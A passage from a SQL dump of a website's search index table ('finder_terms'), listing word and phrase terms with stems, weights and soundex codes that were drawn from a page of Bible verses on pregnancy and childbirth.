(222680, 'separated me from', 'separ me from', 0, 1, 1.5667, 'S1635165', 1, '*'),
(222681, 'separates', 'separ', 0, 0, 0.6, 'S1632', 1, '*'),
(222682, 'separates my', 'separ my', 0, 1, 1.4, 'S16325', 1, '*'),
(222683, 'separates my baby', 'separ my baby', 0, 1, 1.5667, 'S163251', 1, '*'),
(222684, 'shall a', 'shall a', 0, 1, 1.2333, 'S400', 1, '*'),
(222685, 'shall a nation', 'shall a nation', 0, 1, 1.4667, 'S4535', 1, '*'),
(222686, 'shall be like', 'shall be like', 0, 1, 1.4333, 'S4142', 1, '*'),
(222687, 'shall be the', 'shall be the', 0, 1, 1.4, 'S413', 1, '*'),
(222688, 'shall be thy', 'shall be thy', 0, 1, 1.4, 'S413', 1, '*'),
(222689, 'shall be to', 'shall be to', 0, 1, 1.3667, 'S413', 1, '*'),
(222690, 'shall go', 'shall go', 0, 1, 1.2667, 'S420', 1, '*'),
(222691, 'shall go before', 'shall go before', 0, 1, 1.5, 'S4216', 1, '*'),
(222692, 'shall have', 'shall have', 0, 1, 1.3333, 'S410', 1, '*'),
(222693, 'shall have this', 'shall have this', 0, 1, 1.5, 'S4132', 1, '*'),
(222694, 'shall i cause', 'shall i cause', 0, 1, 1.4333, 'S420', 1, '*'),
(222695, 'shall make', 'shall make', 0, 1, 1.3333, 'S452', 1, '*'),
(222696, 'shall make thee', 'shall make thee', 0, 1, 1.5, 'S4523', 1, '*'),
(222697, 'shall not depart', 'shall not depart', 0, 1, 1.5333, 'S453163', 1, '*'),
(222698, 'shall not wither', 'shall not wither', 0, 1, 1.5333, 'S4536', 1, '*'),
(222699, 'shall nothing', 'shall nothing', 0, 1, 1.4333, 'S45352', 1, '*'),
(222700, 'shall nothing cast', 'shall nothing cast', 0, 1, 1.6, 'S453523', 1, '*'),
(222701, 'shall prosper', 'shall prosper', 0, 1, 1.4333, 'S416216', 1, '*'),
(222702, 'shall prosper i', 'shall prosper i', 0, 1, 1.5, 'S416216', 1, '*'),
(222703, 'shall rule', 'shall rule', 0, 1, 1.3333, 'S464', 1, '*'),
(222704, 'shall rule over', 'shall rule over', 0, 1, 1.5, 'S46416', 1, '*'),
(222705, 'shall spring', 'shall spring', 0, 1, 1.4, 'S421652', 1, '*'),
(222706, 'shall spring forth', 'shall spring forth', 0, 1, 1.6, 'S421652163', 1, '*'),
(222707, 'shall the earth', 'shall the earth', 0, 1, 1.5, 'S4363', 1, '*'),
(222708, 'shall thy', 'shall thy', 0, 1, 1.3, 'S430', 1, '*'),
(222709, 'shall thy light', 'shall thy light', 0, 1, 1.5, 'S43423', 1, '*'),
(222710, 'shalt bring', 'shalt bring', 0, 1, 1.3667, 'S431652', 1, '*'),
(222711, 'shalt bring forth', 'shalt bring forth', 0, 1, 1.5667, 'S431652163', 1, '*'),
(222712, 'shalt have', 'shalt have', 0, 1, 1.3333, 'S431', 1, '*'),
(222713, 'shalt have good', 'shalt have good', 0, 1, 1.5, 'S43123', 1, '*'),
(222714, 'shalt have this', 'shalt have this', 0, 1, 1.5, 'S43132', 1, '*'),
(222715, 'shalt make', 'shalt make', 0, 1, 1.3333, 'S4352', 1, '*'),
(222716, 'shalt make thy', 'shalt make thy', 0, 1, 1.4667, 'S43523', 1, '*'),
(222717, 'shalt meditate', 'shalt meditate', 0, 1, 1.4667, 'S4353', 1, '*'),
(222718, 'shalt meditate therein', 'shalt meditate therein', 0, 1, 1.7333, 'S435365', 1, '*'),
(222719, 'she brought', 'she brought', 0, 1, 1.3667, 'S1623', 1, '*'),
(222720, 'she brought forth', 'she brought forth', 0, 1, 1.5667, 'S1623163', 1, '*'),
(222721, 'she conceived', 'she conceived', 0, 1, 1.4333, 'S5213', 1, '*'),
(222722, 'she conceived and', 'she conceived and', 0, 1, 1.5667, 'S521353', 1, '*'),
(222723, 'she hid', 'she hid', 0, 1, 1.2333, 'S300', 1, '*'),
(222724, 'she hid him', 'she hid him', 0, 1, 1.3667, 'S350', 1, '*'),
(222725, 'she saw', 'she saw', 0, 1, 1.2333, 'S000', 1, '*'),
(222726, 'she saw him', 'she saw him', 0, 1, 1.3667, 'S500', 1, '*'),
(222727, 'she travailed', 'she travailed', 0, 1, 1.4333, 'S36143', 1, '*'),
(222728, 'she travailed she', 'she travailed she', 0, 1, 1.5667, 'S361432', 1, '*'),
(222729, 'she was delivered', 'she was delivered', 0, 1, 1.5667, 'S34163', 1, '*'),
(222730, 'she was in', 'she was in', 0, 1, 1.3333, 'S500', 1, '*'),
(222731, 'short for', 'short for', 0, 1, 1.3, 'S6316', 1, '*'),
(222732, 'short for me', 'short for me', 0, 1, 1.4, 'S63165', 1, '*'),
(222733, 'short labour', 'short labour', 0, 1, 1.4, 'S63416', 1, '*'),
(222734, 'short labour period', 'short labour period', 0, 1, 1.6333, 'S63416163', 1, '*'),
(222735, 'should count', 'should count', 0, 1, 1.4, 'S43253', 1, '*'),
(222736, 'should count them', 'should count them', 0, 1, 1.5667, 'S432535', 1, '*'),
(222737, 'shut', 'shut', 0, 0, 0.2667, 'S300', 1, '*'),
(222738, 'shut the', 'shut the', 0, 1, 1.2667, 'S300', 1, '*'),
(222739, 'shut the womb', 'shut the womb', 0, 1, 1.4333, 'S351', 1, '*'),
(222740, 'sick i', 'sick i', 0, 1, 1.2, 'S000', 1, '*'),
(222741, 'sick i am', 'sick i am', 0, 1, 1.3, 'S500', 1, '*'),
(222742, 'sickness reject', 'sick reject', 0, 1, 1.5, 'S52623', 1, '*'),
(222743, 'sickness reject body', 'sick reject body', 0, 1, 1.6667, 'S5262313', 1, '*'),
(222744, 'slay', 'slai', 0, 0, 0.2667, 'S400', 1, '*'),
(222745, 'slay the', 'slai the', 0, 1, 1.2667, 'S430', 1, '*'),
(222746, 'slay the wicked', 'slai the wicked', 0, 1, 1.5, 'S4323', 1, '*'),
(222747, 'so do', 'so do', 0, 1, 1.1667, 'S300', 1, '*'),
(222748, 'so do i', 'so do i', 0, 1, 1.2333, 'S300', 1, '*'),
(222749, 'son also', 'son also', 0, 1, 1.2667, 'S542', 1, '*'),
(222750, 'son also no', 'son also no', 0, 1, 1.3667, 'S5425', 1, '*'),
(222751, 'son also.”', 'son also.”', 0, 1, 1.3333, 'S542', 1, '*'),
(222752, 'son also.” i', 'son also.” i', 0, 1, 1.4, 'S542', 1, '*'),
(222753, 'son attend', 'son attend', 0, 1, 1.3333, 'S5353', 1, '*'),
(222754, 'son attend to', 'son attend to', 0, 1, 1.4333, 'S5353', 1, '*'),
(222755, 'soon as', 'soon as', 0, 1, 1.2333, 'S520', 1, '*'),
(222756, 'soon as the', 'soon as the', 0, 1, 1.3667, 'S523', 1, '*'),
(222757, 'soon as zion', 'soon as zion', 0, 1, 1.4, 'S525', 1, '*'),
(222758, 'sorrow', 'sorrow', 0, 0, 0.4, 'S600', 2, '*'),
(222759, 'sorrow and', 'sorrow and', 0, 1, 1.3333, 'S653', 1, '*'),
(222760, 'sorrow and thy', 'sorrow and thy', 0, 1, 1.4667, 'S653', 1, '*'),
(222761, 'sorrow of', 'sorrow of', 0, 1, 1.3, 'S610', 1, '*'),
(222762, 'sorrow of pregnancy', 'sorrow of pregnancy', 0, 1, 1.6333, 'S616252', 1, '*'),
(222763, 'sorrow thou', 'sorrow thou', 0, 1, 1.3667, 'S630', 1, '*'),
(222764, 'sorrow thou shalt', 'sorrow thou shalt', 0, 1, 1.5667, 'S63243', 1, '*'),
(222765, 'sounded', 'sound', 0, 0, 0.4667, 'S530', 1, '*'),
(222766, 'sounded in', 'sound in', 0, 1, 1.3333, 'S535', 1, '*'),
(222767, 'sounded in mine', 'sound in mine', 0, 1, 1.5, 'S535', 1, '*'),
(222768, 'speedily', 'speedili', 0, 0, 0.5333, 'S134', 1, '*'),
(222769, 'speedily and', 'speedili and', 0, 1, 1.4, 'S13453', 1, '*'),
(222770, 'speedily and thy', 'speedili and thy', 0, 1, 1.5333, 'S13453', 1, '*'),
(222771, 'speedily i', 'speedili i', 0, 1, 1.3333, 'S134', 1, '*'),
(222772, 'speedily i am', 'speedili i am', 0, 1, 1.4333, 'S1345', 1, '*'),
(222773, 'spirit from the', 'spirit from the', 0, 1, 1.5, 'S1631653', 1, '*'),
(222774, 'spring', 'spring', 0, 0, 0.4, 'S1652', 1, '*'),
(222775, 'spring forth', 'spring forth', 0, 1, 1.4, 'S1652163', 1, '*'),
(222776, 'spring forth speedily', 'spring forth speedily', 0, 1, 1.7, 'S16521632134', 1, '*'),
(222777, 'start before', 'start before', 0, 1, 1.4, 'S36316', 1, '*'),
(222778, 'start before pregnancy', 'start before pregnancy', 0, 1, 1.7333, 'S3631616252', 1, '*'),
(222779, 'still birth', 'still birth', 0, 1, 1.3667, 'S34163', 1, '*'),
(222780, 'still birth in', 'still birth in', 0, 1, 1.4667, 'S341635', 1, '*'),
(222781, 'still with', 'still with', 0, 1, 1.3333, 'S343', 1, '*'),
(222782, 'still with thee.”', 'still with thee.”', 0, 1, 1.5667, 'S343', 1, '*'),
(222783, 'strengthened both', 'strengthen both', 0, 1, 1.5667, 'S365235313', 1, '*'),
(222784, 'strengthened both in', 'strengthen both in', 0, 1, 1.6667, 'S3652353135', 1, '*'),
(222785, 'strengtheneth', 'strengtheneth', 0, 0, 0.8667, 'S3652353', 1, '*'),
(222786, 'strengtheneth me.”', 'strengtheneth me.”', 0, 1, 1.6, 'S36523535', 1, '*'),
(222787, 'strengtheneth me.” i', 'strengtheneth me.” i', 0, 1, 1.6667, 'S36523535', 1, '*'),
(222788, 'strengthens', 'strengthen', 0, 0, 0.7333, 'S3652352', 1, '*'),
(222789, 'strengthens me', 'strengthen me', 0, 1, 1.4667, 'S36523525', 1, '*'),
(222790, 'strengthens me i', 'strengthen me i', 0, 1, 1.5333, 'S36523525', 1, '*'),
(222791, 'strong deut', 'strong deut', 0, 1, 1.3667, 'S36523', 1, '*'),
(222792, 'strong deut 28', 'strong deut 28', 0, 1, 1.4667, 'S36523', 1, '*'),
(222793, 'subject', 'subject', 0, 0, 0.4667, 'S123', 1, '*'),
(222794, 'subject to', 'subject to', 0, 1, 1.3333, 'S123', 1, '*'),
(222795, 'subject to any', 'subject to any', 0, 1, 1.4667, 'S1235', 1, '*'),
(222796, 'substance was', 'substanc was', 0, 1, 1.4333, 'S12352', 1, '*'),
(222797, 'substance was not', 'substanc was not', 0, 1, 1.5667, 'S1235253', 1, '*'),
(222798, 'substance yet', 'substanc yet', 0, 1, 1.4333, 'S123523', 1, '*'),
(222799, 'substance yet being', 'substanc yet being', 0, 1, 1.6333, 'S123523152', 1, '*'),
(222800, 'success.”', 'success.”', 0, 0, 0.6, 'S000', 1, '*'),
(222801, 'success.” proverb', 'success.” proverb', 0, 1, 1.5667, 'S16161', 1, '*'),
(222802, 'success.” proverb 4', 'success.” proverb 4', 0, 1, 1.6333, 'S16161', 1, '*'),
(222803, 'such a thing', 'such a thing', 0, 1, 1.4, 'S352', 1, '*'),
(222804, 'such things', 'such things', 0, 1, 1.3667, 'S352', 1, '*'),
(222805, 'such things shall', 'such things shall', 0, 1, 1.5667, 'S3524', 1, '*'),
(222806, 'suck', 'suck', 0, 0, 0.2667, 'S000', 1, '*'),
(222807, 'suck and', 'suck and', 0, 1, 1.2667, 'S530', 1, '*'),
(222808, 'suck and be', 'suck and be', 0, 1, 1.3667, 'S531', 1, '*'),
(222809, 'sucks', 'suck', 0, 0, 0.3333, 'S000', 1, '*'),
(222810, 'sucks well', 'suck well', 0, 1, 1.3333, 'S400', 1, '*'),
(222811, 'sucks well satisfied', 'suck well satisfied', 0, 1, 1.6667, 'S423213', 1, '*'),
(222812, 'sum', 'sum', 0, 0, 0.2, 'S500', 1, '*'),
(222813, 'sum of', 'sum of', 0, 1, 1.2, 'S510', 1, '*'),
(222814, 'sum of them', 'sum of them', 0, 1, 1.3667, 'S5135', 1, '*'),
(222815, 'surgeons', 'surgeon', 0, 0, 0.5333, 'S6252', 1, '*'),
(222816, 'surgeons not', 'surgeon not', 0, 1, 1.4, 'S625253', 1, '*'),
(222817, 'surgeons not forceful', 'surgeon not forceful', 0, 1, 1.7, 'S62525316214', 1, '*'),
(222818, 'survives and', 'surviv and', 0, 1, 1.4, 'S61253', 1, '*'),
(222819, 'survives and triumph', 'surviv and triumph', 0, 1, 1.6667, 'S61253651', 1, '*'),
(222820, 'term in', 'term in', 0, 1, 1.2333, 'T650', 1, '*'),
(222821, 'term in jesus', 'term in jesus', 0, 1, 1.4333, 'T652', 1, '*'),
(222822, 'than the', 'than the', 0, 1, 1.2667, 'T530', 3, '*'),
(222823, 'than the sand', 'than the sand', 0, 1, 1.4333, 'T53253', 1, '*'),
(222824, 'that bringeth', 'that bringeth', 0, 1, 1.4333, 'T16523', 1, '*'),
(222825, 'that bringeth forth', 'that bringeth forth', 0, 1, 1.6333, 'T16523163', 1, '*'),
(222826, 'that find', 'that find', 0, 1, 1.3, 'T153', 1, '*'),
(222827, 'that find them', 'that find them', 0, 1, 1.4667, 'T1535', 1, '*'),
(222828, 'that hangeth', 'that hangeth', 0, 1, 1.4, 'T523', 1, '*'),
(222829, 'that hangeth on', 'that hangeth on', 0, 1, 1.5, 'T5235', 1, '*'),
(222830, 'that he was', 'that he was', 0, 1, 1.3667, 'T200', 2, '*'),
(222831, 'that is written', 'that is written', 0, 1, 1.5, 'T2635', 1, '*'),
(222832, 'that my', 'that my', 0, 1, 1.2333, 'T500', 2, '*'),
(222833, 'that my soul', 'that my soul', 0, 1, 1.4, 'T524', 1, '*'),
(222834, 'that separates', 'that separates', 0, 1, 1.4667, 'T21632', 1, '*'),
(222835, 'that separates my', 'that separates my', 0, 1, 1.5667, 'T216325', 1, '*'),
(222836, 'that strengthens', 'that strengthens', 0, 1, 1.5333, 'T23652352', 1, '*'),
(222837, 'that strengthens me', 'that strengthens me', 0, 1, 1.6333, 'T236523525', 1, '*'),
(222838, 'that the midwife', 'that the midwife', 0, 1, 1.5333, 'T531', 1, '*'),
(222839, 'that thou mayest', 'that thou mayest', 0, 1, 1.5333, 'T523', 1, '*'),
(222840, 'that will attend', 'that will attend', 0, 1, 1.5333, 'T4353', 1, '*'),
(222841, 'that ye may', 'that ye may', 0, 1, 1.3667, 'T500', 1, '*'),
(222842, 'the abundance of', 'the abundance of', 0, 1, 1.5333, 'T153521', 1, '*'),
(222843, 'the baby', 'the baby', 0, 1, 1.2667, 'T100', 1, '*'),
(222844, 'the baby up', 'the baby up', 0, 1, 1.3667, 'T100', 1, '*'),
(222845, 'the barren', 'the barren', 0, 1, 1.3333, 'T165', 1, '*'),
(222846, 'the birth', 'the birth', 0, 1, 1.3, 'T163', 1, '*'),
(222847, 'the birth and', 'the birth and', 0, 1, 1.4333, 'T16353', 1, '*'),
(222848, 'the breasts', 'the breasts', 0, 1, 1.3667, 'T16232', 1, '*'),
(222849, 'the breasts of', 'the breasts of', 0, 1, 1.4667, 'T162321', 1, '*'),
(222850, 'the curse of', 'the curse of', 0, 1, 1.4, 'T2621', 1, '*'),
(222851, 'the days are', 'the days are', 0, 1, 1.4, 'T260', 1, '*'),
(222852, 'the earth.”', 'the earth.”', 0, 1, 1.3667, 'T630', 1, '*'),
(222853, 'the earth.” 16', 'the earth.” 16', 0, 1, 1.4667, 'T630', 1, '*'),
(222854, 'the egyptian', 'the egyptian', 0, 1, 1.4, 'T2135', 1, '*'),
(222855, 'the egyptian women', 'the egyptian women', 0, 1, 1.6, 'T2135', 1, '*'),
(222856, 'the hebrew', 'the hebrew', 0, 1, 1.3333, 'T160', 1, '*'),
(222857, 'the hebrew women', 'the hebrew women', 0, 1, 1.5333, 'T165', 1, '*'),
(222858, 'the inner', 'the inner', 0, 1, 1.3, 'T560', 1, '*'),
(222859, 'the inner and', 'the inner and', 0, 1, 1.4333, 'T5653', 1, '*'),
(222860, 'the knife', 'the knife', 0, 1, 1.3, 'T251', 1, '*'),
(222861, 'the knife of', 'the knife of', 0, 1, 1.4, 'T251', 1, '*'),
(222862, 'the law', 'the law', 0, 1, 1.2333, 'T400', 1, '*'),
(222863, 'the law being', 'the law being', 0, 1, 1.4333, 'T4152', 1, '*'),
(222864, 'the law i', 'the law i', 0, 1, 1.3, 'T400', 1, '*'),
(222865, 'the law shall', 'the law shall', 0, 1, 1.4333, 'T424', 1, '*'),
(222866, 'the lord cut', 'the lord cut', 0, 1, 1.4, 'T46323', 1, '*'),
(222867, 'the lord.”', 'the lord.”', 0, 1, 1.3333, 'T463', 1, '*'),
(222868, 'the lord.” gen', 'the lord.” gen', 0, 1, 1.4667, 'T46325', 1, '*'),
(222869, 'the lord.” i', 'the lord.” i', 0, 1, 1.4, 'T463', 1, '*'),
(222870, 'the lowest parts', 'the lowest parts', 0, 1, 1.5333, 'T4231632', 1, '*'),
(222871, 'the midwife', 'the midwife', 0, 1, 1.3667, 'T531', 1, '*'),
(222872, 'the midwife said', 'the midwife said', 0, 1, 1.5333, 'T53123', 1, '*'),
(222873, 'the midwives', 'the midwives', 0, 1, 1.4, 'T5312', 1, '*'),
(222874, 'the midwives come', 'the midwives come', 0, 1, 1.5667, 'T53125', 1, '*'),
(222875, 'the midwives doctors', 'the midwives doctors', 0, 1, 1.6667, 'T531232362', 1, '*'),
(222876, 'the midwives said', 'the midwives said', 0, 1, 1.5667, 'T53123', 1, '*'),
(222877, 'the morning and', 'the morning and', 0, 1, 1.5, 'T565253', 1, '*'),
(222878, 'the number', 'the number', 0, 1, 1.3333, 'T516', 1, '*'),
(222879, 'the number of', 'the number of', 0, 1, 1.4333, 'T5161', 1, '*'),
(222880, 'the rivers', 'the rivers', 0, 1, 1.3333, 'T6162', 1, '*'),
(222881, 'the rivers of', 'the rivers of', 0, 1, 1.4333, 'T61621', 1, '*'),
(222882, 'the sand', 'the sand', 0, 1, 1.2667, 'T253', 1, '*'),
(222883, 'the sand when', 'the sand when', 0, 1, 1.4333, 'T2535', 1, '*'),
(222884, 'the sorrow', 'the sorrow', 0, 1, 1.3333, 'T260', 1, '*'),
(222885, 'the sorrow of', 'the sorrow of', 0, 1, 1.4333, 'T261', 1, '*'),
(222886, 'the sum', 'the sum', 0, 1, 1.2333, 'T250', 1, '*'),
(222887, 'the sum of', 'the sum of', 0, 1, 1.3333, 'T251', 1, '*'),
(222888, 'the time no', 'the time no', 0, 1, 1.3667, 'T500', 1, '*'),
(222889, 'the vacuum', 'the vacuum', 0, 1, 1.3333, 'T125', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(222890, 'the vacuum pump', 'the vacuum pump', 0, 1, 1.5, 'T125151', 1, '*'),
(222891, 'the wicked', 'the wicked', 0, 1, 1.3333, 'T230', 1, '*'),
(222892, 'the wicked o', 'the wicked o', 0, 1, 1.4, 'T230', 1, '*'),
(222893, 'the woman', 'the woman', 0, 1, 1.3, 'T500', 3, '*'),
(222894, 'the woman he', 'the woman he', 0, 1, 1.4, 'T500', 1, '*'),
(222895, 'the womb', 'the womb', 0, 1, 1.2667, 'T510', 2, '*'),
(222896, 'the womb psalm', 'the womb psalm', 0, 1, 1.4667, 'T51245', 1, '*'),
(222897, 'the womb saith', 'the womb saith', 0, 1, 1.4667, 'T5123', 1, '*'),
(222898, 'thee for', 'thee for', 0, 1, 1.2667, 'T160', 1, '*'),
(222899, 'thee for i', 'thee for i', 0, 1, 1.3333, 'T160', 1, '*'),
(222900, 'thee plenteous', 'thee plenteous', 0, 1, 1.4667, 'T14532', 1, '*'),
(222901, 'thee plenteous in', 'thee plenteous in', 0, 1, 1.5667, 'T145325', 1, '*'),
(222902, 'thee the', 'thee the', 0, 1, 1.2667, 'T000', 1, '*'),
(222903, 'thee the glory', 'thee the glory', 0, 1, 1.4667, 'T246', 1, '*'),
(222904, 'thee when', 'thee when', 0, 1, 1.3, 'T500', 1, '*'),
(222905, 'thee when i', 'thee when i', 0, 1, 1.3667, 'T500', 1, '*'),
(222906, 'thee.”', 'thee.”', 0, 0, 0.4, 'T000', 1, '*'),
(222907, 'thee.” 19.“surely', 'thee.” 19.“surely', 0, 1, 1.5667, 'T264', 1, '*'),
(222908, 'thee.” 19.“surely thou', 'thee.” 19.“surely thou', 0, 1, 1.7333, 'T2643', 1, '*'),
(222909, 'thee.” gal', 'thee.” gal', 0, 1, 1.3333, 'T240', 1, '*'),
(222910, 'thee.” gal 3', 'thee.” gal 3', 0, 1, 1.4, 'T240', 1, '*'),
(222911, 'their flesh', 'their flesh', 0, 1, 1.3667, 'T6142', 1, '*'),
(222912, 'their flesh remain', 'their flesh remain', 0, 1, 1.6, 'T614265', 1, '*'),
(222913, 'their young', 'their young', 0, 1, 1.3667, 'T652', 1, '*'),
(222914, 'their young nor', 'their young nor', 0, 1, 1.5, 'T65256', 1, '*'),
(222915, 'them 18.“if', 'them 18.“if', 0, 1, 1.3667, 'T510', 1, '*'),
(222916, 'them 18.“if i', 'them 18.“if i', 0, 1, 1.4333, 'T510', 1, '*'),
(222917, 'them and health', 'them and health', 0, 1, 1.5, 'T5343', 1, '*'),
(222918, 'them not', 'them not', 0, 1, 1.2667, 'T530', 1, '*'),
(222919, 'them not depart', 'them not depart', 0, 1, 1.5, 'T53163', 1, '*'),
(222920, 'them they', 'them they', 0, 1, 1.3, 'T530', 1, '*'),
(222921, 'them they are', 'them they are', 0, 1, 1.4333, 'T536', 1, '*'),
(222922, 'them.”', 'them.”', 0, 0, 0.4, 'T500', 1, '*'),
(222923, 'them.” 17', 'them.” 17', 0, 1, 1.3, 'T500', 1, '*'),
(222924, 'them.” 17 “how', 'them.” 17 “how', 0, 1, 1.4667, 'T500', 1, '*'),
(222925, 'them.” i', 'them.” i', 0, 1, 1.2667, 'T500', 1, '*'),
(222926, 'them.” i am', 'them.” i am', 0, 1, 1.3667, 'T500', 1, '*'),
(222927, 'then thou', 'then thou', 0, 1, 1.3, 'T530', 1, '*'),
(222928, 'then thou shalt', 'then thou shalt', 0, 1, 1.5, 'T53243', 1, '*'),
(222929, 'there was none', 'there was none', 0, 1, 1.4667, 'T625', 1, '*'),
(222930, 'there were', 'there were', 0, 1, 1.3333, 'T600', 1, '*'),
(222931, 'there were twins', 'there were twins', 0, 1, 1.5333, 'T6352', 1, '*'),
(222932, 'thereafter', 'thereaft', 0, 0, 0.6667, 'T6136', 2, '*'),
(222933, 'thereafter i', 'thereaft i', 0, 1, 1.4, 'T6136', 1, '*'),
(222934, 'thereafter i do', 'thereaft i do', 0, 1, 1.5, 'T61363', 1, '*'),
(222935, 'therefore ye', 'therefor ye', 0, 1, 1.4, 'T616', 1, '*'),
(222936, 'therefore ye bloody', 'therefor ye bloody', 0, 1, 1.6333, 'T616143', 1, '*'),
(222937, 'therein', 'therein', 0, 0, 0.4667, 'T650', 1, '*'),
(222938, 'therein day', 'therein day', 0, 1, 1.3667, 'T653', 1, '*'),
(222939, 'therein day and', 'therein day and', 0, 1, 1.5, 'T65353', 1, '*'),
(222940, 'therein for', 'therein for', 0, 1, 1.3667, 'T6516', 1, '*'),
(222941, 'therein for then', 'therein for then', 0, 1, 1.5333, 'T651635', 1, '*'),
(222942, 'these scriptures', 'these scriptures', 0, 1, 1.5333, 'T261362', 1, '*'),
(222943, 'these scriptures your', 'these scriptures your', 0, 1, 1.7, 'T2613626', 1, '*'),
(222944, 'they are life', 'thei are life', 0, 1, 1.4333, 'T641', 1, '*'),
(222945, 'they are lively', 'thei are lively', 0, 1, 1.5, 'T6414', 1, '*'),
(222946, 'they are more', 'thei are more', 0, 1, 1.4333, 'T656', 1, '*'),
(222947, 'they will do', 'thei will do', 0, 1, 1.4, 'T430', 1, '*'),
(222948, 'thine ear', 'thine ear', 0, 1, 1.3, 'T560', 1, '*'),
(222949, 'thine ear unto', 'thine ear unto', 0, 1, 1.4667, 'T5653', 1, '*'),
(222950, 'thine eyes', 'thine eyes', 0, 1, 1.3333, 'T520', 1, '*'),
(222951, 'thine eyes keep', 'thine eyes keep', 0, 1, 1.5, 'T521', 1, '*'),
(222952, 'thine health', 'thine health', 0, 1, 1.4, 'T543', 1, '*'),
(222953, 'thine health shall', 'thine health shall', 0, 1, 1.6, 'T54324', 1, '*'),
(222954, 'thine heart 22', 'thine heart 22', 0, 1, 1.4667, 'T563', 1, '*'),
(222955, 'thing who', 'thing who', 0, 1, 1.3, 'T520', 1, '*'),
(222956, 'thing who hath', 'thing who hath', 0, 1, 1.4667, 'T523', 1, '*'),
(222957, 'things easy', 'thing easy', 0, 1, 1.3667, 'T520', 1, '*'),
(222958, 'things easy gen', 'thing easy gen', 0, 1, 1.5, 'T525', 1, '*'),
(222959, 'things shall', 'thing shall', 0, 1, 1.4, 'T524', 1, '*'),
(222960, 'things shall the', 'thing shall the', 0, 1, 1.5333, 'T5243', 1, '*'),
(222961, 'things through', 'thing through', 0, 1, 1.4667, 'T52362', 1, '*'),
(222962, 'things through christ', 'thing through christ', 0, 1, 1.7, 'T52362623', 1, '*'),
(222963, 'this son', 'thi son', 0, 1, 1.2667, 'T250', 1, '*'),
(222964, 'this son also', 'thi son also', 0, 1, 1.4333, 'T2542', 1, '*'),
(222965, 'this son also.”', 'thi son also.”', 0, 1, 1.5, 'T2542', 1, '*'),
(222966, 'those that find', 'those that find', 0, 1, 1.5, 'T23153', 1, '*'),
(222967, 'thou hast covered', 'thou hast covered', 0, 1, 1.5667, 'T232163', 1, '*'),
(222968, 'thou hast possessed', 'thou hast possessed', 0, 1, 1.6333, 'T23123', 1, '*'),
(222969, 'thou mayest', 'thou mayest', 0, 1, 1.3667, 'T523', 1, '*'),
(222970, 'thou mayest observe', 'thou mayest observe', 0, 1, 1.6333, 'T5231261', 1, '*'),
(222971, 'thou shall', 'thou shall', 0, 1, 1.3333, 'T240', 1, '*'),
(222972, 'thou shall have', 'thou shall have', 0, 1, 1.5, 'T241', 1, '*'),
(222973, 'thou shalt bring', 'thou shalt bring', 0, 1, 1.5333, 'T2431652', 1, '*'),
(222974, 'thou shalt have', 'thou shalt have', 0, 1, 1.5, 'T2431', 1, '*'),
(222975, 'thou shalt make', 'thou shalt make', 0, 1, 1.5, 'T24352', 1, '*'),
(222976, 'thou shalt meditate', 'thou shalt meditate', 0, 1, 1.6333, 'T24353', 1, '*'),
(222977, 'thou wilt', 'thou wilt', 0, 1, 1.3, 'T430', 1, '*'),
(222978, 'thou wilt slay', 'thou wilt slay', 0, 1, 1.4667, 'T4324', 1, '*'),
(222979, 'thoughts unto', 'thought unto', 0, 1, 1.4333, 'T23253', 1, '*'),
(222980, 'thoughts unto me', 'thought unto me', 0, 1, 1.5333, 'T232535', 1, '*'),
(222981, 'three months.”', 'three months.”', 0, 1, 1.4667, 'T6532', 1, '*'),
(222982, 'three months.” my', 'three months.” my', 0, 1, 1.5667, 'T65325', 1, '*'),
(222983, 'through christ', 'through christ', 0, 1, 1.4667, 'T62623', 1, '*'),
(222984, 'through christ that', 'through christ that', 0, 1, 1.6333, 'T62623', 1, '*'),
(222985, 'through christ which', 'through christ which', 0, 1, 1.6667, 'T626232', 1, '*'),
(222986, 'thy body', 'thy body', 0, 1, 1.2667, 'T130', 1, '*'),
(222987, 'thy body ..”', 'thy body ..”', 0, 1, 1.4, 'T130', 1, '*'),
(222988, 'thy body,”', 'thy body,”', 0, 1, 1.3333, 'T130', 1, '*'),
(222989, 'thy body,” 11a-”and', 'thy body,” 11a-”and', 0, 1, 1.6333, 'T1353', 1, '*'),
(222990, 'thy book', 'thy book', 0, 1, 1.2667, 'T120', 1, '*'),
(222991, 'thy book all', 'thy book all', 0, 1, 1.4, 'T124', 1, '*'),
(222992, 'thy conception', 'thy conception', 0, 1, 1.4667, 'T252135', 1, '*'),
(222993, 'thy conception in', 'thy conception in', 0, 1, 1.5667, 'T252135', 1, '*'),
(222994, 'thy days', 'thy days', 0, 1, 1.2667, 'T200', 1, '*'),
(222995, 'thy days i', 'thy days i', 0, 1, 1.3333, 'T200', 1, '*'),
(222996, 'thy desire', 'thy desire', 0, 1, 1.3333, 'T260', 1, '*'),
(222997, 'thy desire shall', 'thy desire shall', 0, 1, 1.5333, 'T2624', 1, '*'),
(222998, 'thy god i', 'thy god i', 0, 1, 1.3, 'T230', 1, '*'),
(222999, 'thy husband', 'thy husband', 0, 1, 1.3667, 'T2153', 1, '*'),
(223000, 'thy husband and', 'thy husband and', 0, 1, 1.5, 'T215353', 1, '*'),
(223001, 'thy land', 'thy land', 0, 1, 1.2667, 'T453', 1, '*'),
(223002, 'thy land the', 'thy land the', 0, 1, 1.4, 'T453', 1, '*'),
(223003, 'thy light break', 'thy light break', 0, 1, 1.5, 'T423162', 1, '*'),
(223004, 'thy mouth but', 'thy mouth but', 0, 1, 1.4333, 'T5313', 1, '*'),
(223005, 'thy reward.”', 'thy reward.”', 0, 1, 1.4, 'T630', 1, '*'),
(223006, 'thy reward.” my', 'thy reward.” my', 0, 1, 1.5, 'T635', 1, '*'),
(223007, 'thy righteousness', 'thy righteousness', 0, 1, 1.5667, 'T623252', 1, '*'),
(223008, 'thy righteousness shall', 'thy righteousness shall', 0, 1, 1.7667, 'T6232524', 1, '*'),
(223009, 'thy salutation', 'thy salutation', 0, 1, 1.4667, 'T2435', 1, '*'),
(223010, 'thy salutation sounded', 'thy salutation sounded', 0, 1, 1.7333, 'T2435253', 1, '*'),
(223011, 'thy sorrow', 'thy sorrow', 0, 1, 1.3333, 'T260', 1, '*'),
(223012, 'thy sorrow and', 'thy sorrow and', 0, 1, 1.4667, 'T2653', 1, '*'),
(223013, 'thy thoughts', 'thy thoughts', 0, 1, 1.4, 'T232', 1, '*'),
(223014, 'thy thoughts unto', 'thy thoughts unto', 0, 1, 1.5667, 'T23253', 1, '*'),
(223015, 'thy way', 'thy way', 0, 1, 1.2333, 'T000', 1, '*'),
